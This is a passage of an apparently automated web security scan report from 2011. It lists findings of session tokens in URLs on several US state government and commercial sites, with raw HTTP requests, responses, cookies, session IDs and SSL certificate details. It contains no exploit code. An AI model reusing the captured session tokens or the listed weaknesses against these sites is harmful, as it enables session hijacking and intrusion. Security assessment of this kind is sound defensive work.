Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=3209989796884927126; LivePersonID=LP i=16601209214853,d=1303177644; HumanClickACTIVE=1304123898833

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:38:23 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_33511087=STANDALONE; path=/hc/33511087
Set-Cookie: LivePersonID=-16601209214853-1304123902:-1:-1:-1:-1; expires=Sun, 29-Apr-2012 00:38:23 GMT; path=/hc/33511087; domain=.liveperson.net
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 34

GIF89aP............,...........L.;

8.21. https://services.georgia.gov/dhr/cspp/do/public/Welcome  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://services.georgia.gov
Path:   /dhr/cspp/do/public/Welcome

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /dhr/cspp/do/public/Welcome HTTP/1.1
Host: services.georgia.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sat, 30 Apr 2011 12:22:50 GMT
Server: Sun-Java-System/Application-Server
Content-type: text/html;charset=UTF-8
X-powered-by: Servlet/2.4
Pragma: No-cache
Cache-control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-powered-by: JSP/2.0
Set-cookie: JSESSIONID=a6618311cdf773ffffffff8fe26605d0e2529; Path=/dhr/cspp
Connection: close


<html>
<body>


<table border="0" cellspacing="0" cellpadding="0">
   <tr>
       <td>
           <body style="background-color:#E2E1C3;">
               <TABLE cellSpacing=0 cellPadding=0 wid
...[SNIP]...
</table>


<link href="/dhr/cspp/pages/cspp.css;jsessionid=a6618311cdf773ffffffff8fe26605d0e2529" rel="stylesheet" type="text/css"/>

<script>
...[SNIP]...
<td valign="bottom" width="125" height="35">
<a href="/dhr/cspp/do/public/MakePayment;jsessionid=a6618311cdf773ffffffff8fe26605d0e2529"><img border="0" name="MakePayment" alt="Make Payment" src="/dhr/cspp/pages/images/MakePaymentUp.gif" width="125" height="36"/>
...[SNIP]...
<td valign="bottom" width="125" height="35">
<a href="/dhr/cspp/do/public/ApplyNow;jsessionid=a6618311cdf773ffffffff8fe26605d0e2529"><img border="0" name="ApplyNow" alt="Apply Now" src="/dhr/cspp/pages/images/ApplyNowUp.gif" width="125" height="36"/>
...[SNIP]...
<td valign="bottom" width="125" height="35">
<a href="/dhr/cspp/do/Payments;jsessionid=a6618311cdf773ffffffff8fe26605d0e2529"><img border="0" name="Payments" alt="Payments" src="/dhr/cspp/pages/images/CasePaymentsUp.gif" width="125" height="36"/>
...[SNIP]...
<td valign="bottom" width="125" height="35">
<a href="/dhr/cspp/do/PersonalInfo;jsessionid=a6618311cdf773ffffffff8fe26605d0e2529"><img border="0" name="ProvideInfo" alt="Provide Info" src="/dhr/cspp/pages/images/ProvideInfoUp.gif" width="125" height="36"/>
...[SNIP]...
<td valign="bottom" width="125" height="35">
<a href="/dhr/cspp/do/FetchMyCaseInformation;jsessionid=a6618311cdf773ffffffff8fe26605d0e2529"><img border="0" name="MyCase" alt="My Case" src="/dhr/cspp/pages/images/MyCaseUp.gif" width="125" height="36"/>
...[SNIP]...
<b><a href="/dhr/cspp/do/public/Register;jsessionid=a6618311cdf773ffffffff8fe26605d0e2529" style="text-decoration: none; color: white">Register</a>
...[SNIP]...
<b><a href="/dhr/cspp/do/public/OfficeFinder;jsessionid=a6618311cdf773ffffffff8fe26605d0e2529" style="text-decoration: none; color: white">Office Finder</a>
...[SNIP]...
<b><a href="/dhr/cspp/do/public/FAQ;jsessionid=a6618311cdf773ffffffff8fe26605d0e2529" style="text-decoration: none; color: white">FAQ</a>
...[SNIP]...
<b><a href="/dhr/cspp/do/public/SiteMap;jsessionid=a6618311cdf773ffffffff8fe26605d0e2529" style="text-decoration: none; color: white">Site Map</a>
...[SNIP]...
<b><a href="/dhr/cspp/do/Logon;jsessionid=a6618311cdf773ffffffff8fe26605d0e2529" style="text-decoration: none; color: white">Sign In</a>
...[SNIP]...
<td width="84%" ><a href="/dhr/cspp/do/public/SupportCalc;jsessionid=a6618311cdf773ffffffff8fe26605d0e2529"><p class="linkFont1">
...[SNIP]...
<td width="84%" ><a href="/dhr/cspp/do/public/Mission;jsessionid=a6618311cdf773ffffffff8fe26605d0e2529"><p class="linkFont1">
...[SNIP]...
<td width="84%"><a href="/dhr/cspp/do/public/Services;jsessionid=a6618311cdf773ffffffff8fe26605d0e2529"><p class="linkFont1">
...[SNIP]...
<td width="84%" ><a href="/dhr/cspp/do/public/CSProcess;jsessionid=a6618311cdf773ffffffff8fe26605d0e2529"><p class="linkFont1">
...[SNIP]...
<td width="84%" ><a href="/dhr/cspp/do/public/Facts;jsessionid=a6618311cdf773ffffffff8fe26605d0e2529"><p class="linkFont1">
...[SNIP]...
<td width="84%" ><a href="/dhr/cspp/do/public/Paternity;jsessionid=a6618311cdf773ffffffff8fe26605d0e2529"><p class="linkFont1">
...[SNIP]...
<td ><a href="/dhr/cspp/do/public/EmploymentTraining;jsessionid=a6618311cdf773ffffffff8fe26605d0e2529"><p class="linkFont1">
...[SNIP]...
<td width="84%" ><a href="/dhr/cspp/do/public/Contact;jsessionid=a6618311cdf773ffffffff8fe26605d0e2529"><p class="linkFont1">
...[SNIP]...
<td>    
                   <a href="/dhr/cspp/do/public/MakePayment;jsessionid=a6618311cdf773ffffffff8fe26605d0e2529"><p class="linkFont2">
...[SNIP]...
<li><a href="/dhr/cspp/do/public/PaymentFrequency;jsessionid=a6618311cdf773ffffffff8fe26605d0e2529"><p class="linkFont2">
...[SNIP]...

8.22. http://www.budget.state.pa.us/portal/server.pt/community/current_and_proposed_commonwealth_budgets/4566  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.budget.state.pa.us
Path:   /portal/server.pt/community/current_and_proposed_commonwealth_budgets/4566

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /portal/server.pt/community/current_and_proposed_commonwealth_budgets/4566 HTTP/1.1
Host: www.budget.state.pa.us
Proxy-Connection: keep-alive
Referer: http://pa.gov/portal/server.pt/community/pa_gov/2966
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:37:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Language: en
Set-Cookie: ASP.NET_SessionId=o0wp4k55g2s4a4miw52ccf55; path=/
Expires: 1304037449218
Cache-Control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0
Last-Modified: 1304123849218
Content-Type: text/html; charset=utf-8
Content-Length: 52356

<html>

<head><link type="text/css" href="http://www.portal.state.pa.us/imageserver/plumtree/common/public/css/mainstyle19-en.css" rel="StyleSheet" lang="en"></link><title>Current and Proposed Commonw
...[SNIP]...
<LI><A title="2010-11 Enacted Budget (House Bill 2279 Printer's Number 4032) .pdf" href="http://www.legis.state.pa.us/cfdocs/legis/PN/Public/btCheck.cfm?txtType=HTM&amp;sessYr=2009&amp;sessInd=0&amp;billBody=H&amp;billTyp=B&amp;billNbr=2279&amp;pn=4032"><FONT face=verdana size=2>
...[SNIP]...

8.23. http://www.ehawaii.gov/dakine/index.html  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.ehawaii.gov
Path:   /dakine/index.html

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /dakine/index.html HTTP/1.1
Host: www.ehawaii.gov
Proxy-Connection: keep-alive
Referer: http://hawaii.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 22:09:59 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 21026


<?xml version="1.0"?>


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<he
...[SNIP]...
<img src="images/bullet-arrow.gif" align="absmiddle"/>&nbsp;&nbsp;<a href="https://htsb.ehawaii.gov/htsb-renewals/welcome.html;jsessionid=003DF36FB436AFBA4EB19C4930FE3D85.liona" class="orange2">Renew Your Teachers License Online</a>
...[SNIP]...

8.24. http://www.goccp.maryland.gov/lists/index.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.goccp.maryland.gov
Path:   /lists/index.php

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /lists/index.php HTTP/1.1
Host: www.goccp.maryland.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:36:00 GMT
Content-Type: text/html
Connection: close
Server: Apache/2
Set-Cookie: PHPSESSID=77254ae051338ab028c5b4d6ba57ff9f; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 14316

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html><head>
<meta http-equiv="Cache-Control" content="no-cache, must-revalidate" />
<meta http
...[SNIP]...
<noscript><a href="/resources/resource_main.php/?PHPSESSID=77254ae051338ab028c5b4d6ba57ff9f" title="General External State of Maryland links.">General State of Maryland Links</a>
...[SNIP]...
</a>
           <a href="?PHPSESSID=77254ae051338ab028c5b4d6ba57ff9f" id="print-page" onclick="window.print()"><span class="img-replace">
...[SNIP]...
<p><a href="./?p=subscribe&PHPSESSID=77254ae051338ab028c5b4d6ba57ff9f">Subscribe to our Newsletters</a>
...[SNIP]...
<p><a href="./?p=unsubscribe&PHPSESSID=77254ae051338ab028c5b4d6ba57ff9f">Unsubscribe from our Newsletters</a>
...[SNIP]...

8.25. http://www.in.gov/dhs/3163.htm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.in.gov
Path:   /dhs/3163.htm

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /dhs/3163.htm HTTP/1.1
Host: www.in.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; BIGipServerwww.IN.gov-http=1882523658.20480.0000; __utmb=58136434.2.10.1304126856;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:39:00 GMT
Server: Apache/2.2.13 (Unix) DAV/2
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Set-Cookie: BIGipServerdhs_web_prod=2536835082.20480.0000; expires=Sat, 30-Apr-2011 12:40:00 GMT; path=/
Content-Length: 36537

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><!-- PageID 3163 - pub
...[SNIP]...
<li><a href="https://oas.in.gov:4443/hs/dev/flood/public/index.jsp;jsessionid=0af00a9730d7f091b4d3d4e248f39ab8b1d503eb5be3.e38OaxuQbx4Nai0Sch0Nax4Qahz0" target="_self">Create a Damage Assessment Report</a>
...[SNIP]...

8.26. http://www.kodakgallery.com/gallery/lp/2010/visit_florida/vacation_photos.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.kodakgallery.com
Path:   /gallery/lp/2010/visit_florida/vacation_photos.jsp

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /gallery/lp/2010/visit_florida/vacation_photos.jsp HTTP/1.1
Host: www.kodakgallery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Expires: -1
Set-Cookie: JSESSIONID=D46B50E50B2D7896BD5D3180384FFEF2.ecom302_main; Domain=kodakgallery.com; Path=/
Set-Cookie: sourceId=500019816903; Domain=kodakgallery.com; Expires=Mon, 30-May-2011 12:39:07 GMT; Path=/
Set-Cookie: sourceId=null; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: DYN_EMAIL=anon_mem1216050931@kodakgallery.com; Domain=kodakgallery.com; Path=/
Set-Cookie: bookStartTest1=control; Domain=kodakgallery.com; Expires=Sun, 29-Apr-2012 12:39:07 GMT; Path=/
Set-Cookie: bookUnlockedLayoutTest=lockedLayout; Domain=kodakgallery.com; Expires=Sun, 29-Apr-2012 12:39:07 GMT; Path=/
Set-Cookie: ft_80002=none; Domain=kodakgallery.com; Expires=Sun, 29-Apr-2012 12:39:07 GMT; Path=/
Set-Cookie: abTest=bookStartTest1-bookUnlockedLayoutTest-ft_80002-; Domain=kodakgallery.com; Expires=Sun, 29-Apr-2012 12:39:07 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Sat, 30 Apr 2011 12:39:07 GMT
Server: ecom302
Connection: close
Content-Length: 38122

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <meta http-equ
...[SNIP]...
<li>                                        
                                                                                           <a href="/photo-cards/anniversary-love/pc-Cards-c-C140002;jsessionid=D46B50E50B2D7896BD5D3180384FFEF2.ecom302_main">Anniversary / Love</a>
...[SNIP]...
<li>                                        
                                                                                           <a href="/photo-cards/baby-announcements/pc-Cards-c-cat_10010004;jsessionid=D46B50E50B2D7896BD5D3180384FFEF2.ecom302_main">Baby</a>
...[SNIP]...
<li>                                        
                                                                                           <a href="/photo-cards/birthday/pc-Cards-c-cat_10020001;jsessionid=D46B50E50B2D7896BD5D3180384FFEF2.ecom302_main">Birthday</a>
...[SNIP]...
<li>                                        
                                                                                           <a href="/photo-cards/full-photo-and-solids/pc-Cards-c-C450003;jsessionid=D46B50E50B2D7896BD5D3180384FFEF2.ecom302_main">Full Photo &amp; Solids</a>
...[SNIP]...
<li>                                        
                                                                                           <a href="/photo-cards/graduation/pc-Cards-c-Cat140017;jsessionid=D46B50E50B2D7896BD5D3180384FFEF2.ecom302_main">Graduation</a>
...[SNIP]...
<li>                                        
                                                                                           <a href="/photo-cards/kids/pc-Cards-c-cat_10020013;jsessionid=D46B50E50B2D7896BD5D3180384FFEF2.ecom302_main">Kids</a>
...[SNIP]...
<li>                                        
                                                                                           <a href="/photo-cards/thank-you/pc-Cards-c-cat_10020021;jsessionid=D46B50E50B2D7896BD5D3180384FFEF2.ecom302_main">Thank You</a>
...[SNIP]...
<li>                                        
                                                                                           <a href="/photo-cards/wedding/pc-Cards-c-cat_10010010;jsessionid=D46B50E50B2D7896BD5D3180384FFEF2.ecom302_main">Wedding</a>
...[SNIP]...
<li>                                        
                                                                                           <a href="/photo-cards/contact-cards/pc-Cards-c-C1160002;jsessionid=D46B50E50B2D7896BD5D3180384FFEF2.ecom302_main">Contact Cards</a>
...[SNIP]...
<li>                                        
                                                                                           <a href="/photo-cards/mothers-day/pc-Cards-c-C1610001;jsessionid=D46B50E50B2D7896BD5D3180384FFEF2.ecom302_main">Mother's Day</a>
...[SNIP]...

8.27. http://www.legis.state.pa.us/cfdocs/legis/PN/Public/btCheck.cfm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.legis.state.pa.us
Path:   /cfdocs/legis/PN/Public/btCheck.cfm

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /cfdocs/legis/PN/Public/btCheck.cfm?txtType=HTM&sessYr=2009&sessInd=0&billBody=H&billTyp=B&billNbr=2279&pn=4032 HTTP/1.1
Host: www.legis.state.pa.us
Proxy-Connection: keep-alive
Referer: http://www.budget.state.pa.us/portal/server.pt/community/current_and_proposed_commonwealth_budgets/4566
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 00:41:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html

<html style=""><head style=""><title style="">Regular Session 2009-2010 House Bill 2279 P.N. 4032&#160;</title>
<META content="text/html; charset=UTF-8" http-equiv="Content-Type" style=""></META>

       <
...[SNIP]...

8.28. https://www.myhealth.va.gov/mhv-portal-web/anonymous.portal  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.myhealth.va.gov
Path:   /mhv-portal-web/anonymous.portal

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /mhv-portal-web/anonymous.portal HTTP/1.1
Host: www.myhealth.va.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:39:37 GMT
Content-type: text/html; charset=UTF-8
Cache-Control: no-cache="set-cookie"
Pragma: No-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
X-wily-servlet: Clear appServerIp=10.224.43.30&agentName=mhvma_ms10b&servletName=PortalServlet&agentHost=vamhvapp16&agentProcess=WebLogic
Set-Cookie: JSESSIONID=KyLqN8DJhdxQkMWNBN5PPL1jpnXWpKnWSJfpSmHlbmxPZLbmfqt6!-587569185; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
X-wily-info: Clear guid=A66BDECC0AE02B1E0053836AAA14FF5A
Connection: close
Set-Cookie: TSd0b0d9=f8f48700ac5e28f4a998bfb011b276dc9b3028ce4c2a4a934dbc0308; Path=/
Content-Length: 22826


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>


   <head>


<title>My HealtheVet </title><meta name="bea-portal-me
...[SNIP]...
<li class="bea-portal-book-primary-menu-single-item-active"><a href="https://www.myhealth.va.gov:443/mhv-portal-web/anonymous.portal;jsessionid=KyLqN8DJhdxQkMWNBN5PPL1jpnXWpKnWSJfpSmHlbmxPZLbmfqt6!-587569185?_nfpb=true&_pageLabel=home&_nfls=false">HOME</a></li><li class="bea-portal-book-primary-menu-single-item"><a href="https://www.myhealth.va.gov:443/mhv-portal-web/anonymous.portal;jsessionid=KyLqN8DJhdxQkMWNBN5PPL1jpnXWpKnWSJfpSmHlbmxPZLbmfqt6!-587569185?_nfpb=true&_pageLabel=personalInformation&_nfls=false">PERSONAL INFORMATION</a>
...[SNIP]...
<li class="bea-portal-book-primary-menu-single-item"><a href="https://www.myhealth.va.gov:443/mhv-portal-web/anonymous.portal;jsessionid=KyLqN8DJhdxQkMWNBN5PPL1jpnXWpKnWSJfpSmHlbmxPZLbmfqt6!-587569185?_nfpb=true&_pageLabel=pharmacy&_nfls=false">PHARMACY</a></li><li class="bea-portal-book-primary-menu-single-item"><a href="https://www.myhealth.va.gov:443/mhv-portal-web/anonymous.portal;jsessionid=KyLqN8DJhdxQkMWNBN5PPL1jpnXWpKnWSJfpSmHlbmxPZLbmfqt6!-587569185?_nfpb=true&_pageLabel=researchHealth&_nfls=false">RESEARCH HEALTH</a>
...[SNIP]...
<li class="bea-portal-book-primary-menu-single-item"><a href="https://www.myhealth.va.gov:443/mhv-portal-web/anonymous.portal;jsessionid=KyLqN8DJhdxQkMWNBN5PPL1jpnXWpKnWSJfpSmHlbmxPZLbmfqt6!-587569185?_nfpb=true&_pageLabel=getCare&_nfls=false">GET CARE</a></li><li class="bea-portal-book-primary-menu-single-item"><a href="https://www.myhealth.va.gov:443/mhv-portal-web/anonymous.portal;jsessionid=KyLqN8DJhdxQkMWNBN5PPL1jpnXWpKnWSJfpSmHlbmxPZLbmfqt6!-587569185?_nfpb=true&_pageLabel=trackHealth&_nfls=false">TRACK HEALTH</a>
...[SNIP]...
<li class="bea-portal-book-primary-menu-single-item"><a href="https://www.myhealth.va.gov:443/mhv-portal-web/anonymous.portal;jsessionid=KyLqN8DJhdxQkMWNBN5PPL1jpnXWpKnWSJfpSmHlbmxPZLbmfqt6!-587569185?_nfpb=true&_pageLabel=mhvCommunity&_nfls=false">MHV COMMUNITY</a>
...[SNIP]...
<li class="bea-portal-book-menu-single-item-active"><a href="https://www.myhealth.va.gov:443/mhv-portal-web/anonymous.portal;jsessionid=KyLqN8DJhdxQkMWNBN5PPL1jpnXWpKnWSJfpSmHlbmxPZLbmfqt6!-587569185?_nfpb=true&_pageLabel=learnAbout&_nfls=false">LEARN ABOUT</a>
...[SNIP]...
<li class="bea-portal-book-menu-single-item"><a href="https://www.myhealth.va.gov:443/mhv-portal-web/anonymous.portal;jsessionid=KyLqN8DJhdxQkMWNBN5PPL1jpnXWpKnWSJfpSmHlbmxPZLbmfqt6!-587569185?_nfpb=true&_pageLabel=whatsNew&_nfls=false">WHAT'S NEW?</a>
...[SNIP]...
<li class="bea-portal-book-menu-single-item"><a href="https://www.myhealth.va.gov:443/mhv-portal-web/anonymous.portal;jsessionid=KyLqN8DJhdxQkMWNBN5PPL1jpnXWpKnWSJfpSmHlbmxPZLbmfqt6!-587569185?_nfpb=true&_pageLabel=comingSoon&_nfls=false">COMING SOON</a>
...[SNIP]...

8.29. http://www.utah.gov/transparency/index.html  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.utah.gov
Path:   /transparency/index.html

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /transparency/index.html HTTP/1.1
Host: www.utah.gov
Proxy-Connection: keep-alive
Referer: http://www.utah.gov/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147646579.1304162117.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=147646579.301159884.1304162117.1304162117.1304162117.1; __utmc=147646579; __utmb=147646579.1.10.1304162117; fontsize=90%25; city=Salt%20Lake%20City; zip=84101

Response

HTTP/1.1 200 OK
X-Powered-By: JSP/2.1
Server: Sun Java System Application Server 9.1_02
Set-Cookie: JSESSIONID=626d4214fda370cce1e6f0b9f88f; Path=/transparency
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Sat, 30 Apr 2011 11:24:13 GMT
Content-Length: 18333


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...
<a href="entity_profile.html?id=287"><img src="/transparency/files/287.jpg;jsessionid=626d4214fda370cce1e6f0b9f88f" /></a>
...[SNIP]...
<a href="entity_profile.html?id=461"><img src="/transparency/files/461.jpg;jsessionid=626d4214fda370cce1e6f0b9f88f" /></a>
...[SNIP]...
<a href="entity_profile.html?id=545"><img src="/transparency/files/545.jpg;jsessionid=626d4214fda370cce1e6f0b9f88f" /></a>
...[SNIP]...
<a href="entity_profile.html?id=367"><img src="/transparency/files/367.jpg;jsessionid=626d4214fda370cce1e6f0b9f88f" /></a>
...[SNIP]...
<a href="entity_profile.html?id=647"><img src="/transparency/files/647.jpg;jsessionid=626d4214fda370cce1e6f0b9f88f" /></a>
...[SNIP]...

9. SSL certificate  previous  next
There are 7 instances of this issue:


9.1. https://nhlicenses2.nh.gov/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://nhlicenses2.nh.gov
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:The server presented the following certificate:

Issued to:  nhlicenses2.nh.gov
Issued by:  GeoTrust SSL CA
Valid from:  Wed Feb 16 09:04:49 CST 2011
Valid to:  Fri Apr 19 13:56:42 CDT 2013

9.2. https://mibid.bidcorp.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mibid.bidcorp.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.bidcorp.com
Issued by:  RapidSSL CA
Valid from:  Sat Feb 12 06:22:11 CST 2011
Valid to:  Mon Apr 15 03:24:27 CDT 2013

Certificate chain #1

Issued to:  RapidSSL CA
Issued by:  GeoTrust Global CA
Valid from:  Fri Feb 19 16:45:05 CST 2010
Valid to:  Tue Feb 18 16:45:05 CST 2020

Certificate chain #2

Issued to:  GeoTrust Global CA
Issued by:  GeoTrust Global CA
Valid from:  Mon May 20 23:00:00 CDT 2002
Valid to:  Fri May 20 23:00:00 CDT 2022

9.3. https://nhlicenses.nh.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://nhlicenses.nh.gov
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  nhlicenses.nh.gov
Issued by:  Equifax Secure Certificate Authority
Valid from:  Fri Mar 26 00:34:13 CDT 2010
Valid to:  Mon Jun 25 21:31:26 CDT 2012

Certificate chain #1

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 11:41:51 CDT 1998
Valid to:  Wed Aug 22 11:41:51 CDT 2018

9.4. https://treas-secure.treas.state.mi.us/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://treas-secure.treas.state.mi.us
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  TREAS-SECURE.TREAS.STATE.MI.US
Issued by:  VeriSign Class 3 Secure Server CA - G2
Valid from:  Mon Jun 21 19:00:00 CDT 2010
Valid to:  Sat Jul 09 18:59:59 CDT 2011

Certificate chain #1

Issued to:  VeriSign Class 3 Secure Server CA - G2
Issued by:  VeriSign Trust Network
Valid from:  Tue Mar 24 19:00:00 CDT 2009
Valid to:  Sun Mar 24 18:59:59 CDT 2019

Certificate chain #2

Issued to:  VeriSign Trust Network
Issued by:  VeriSign Trust Network
Valid from:  Sun May 17 19:00:00 CDT 1998
Valid to:  Tue Aug 01 18:59:59 CDT 2028

9.5. https://www.alabamainteractive.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.alabamainteractive.org
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.alabamainteractive.org
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sun Aug 16 23:56:09 CDT 2009
Valid to:  Thu Oct 17 04:54:34 CDT 2013

Certificate chain #1

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 11:41:51 CDT 1998
Valid to:  Wed Aug 22 11:41:51 CDT 2018

9.6. https://www.compasssmartshopper.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.compasssmartshopper.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.compasssmartshopper.com
Issued by:  Go Daddy Secure Certification Authority
Valid from:  Wed Jun 23 11:33:26 CDT 2010
Valid to:  Sun Jun 23 11:33:26 CDT 2013

Certificate chain #1

Issued to:  Go Daddy Secure Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Wed Nov 15 19:54:37 CST 2006
Valid to:  Sun Nov 15 19:54:37 CST 2026

Certificate chain #2

Issued to:  Go Daddy Class 2 Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Tue Jun 29 12:06:20 CDT 2004
Valid to:  Thu Jun 29 12:06:20 CDT 2034

9.7. https://www.nrsservicecenter.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.nrsservicecenter.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.nrsservicecenter.com
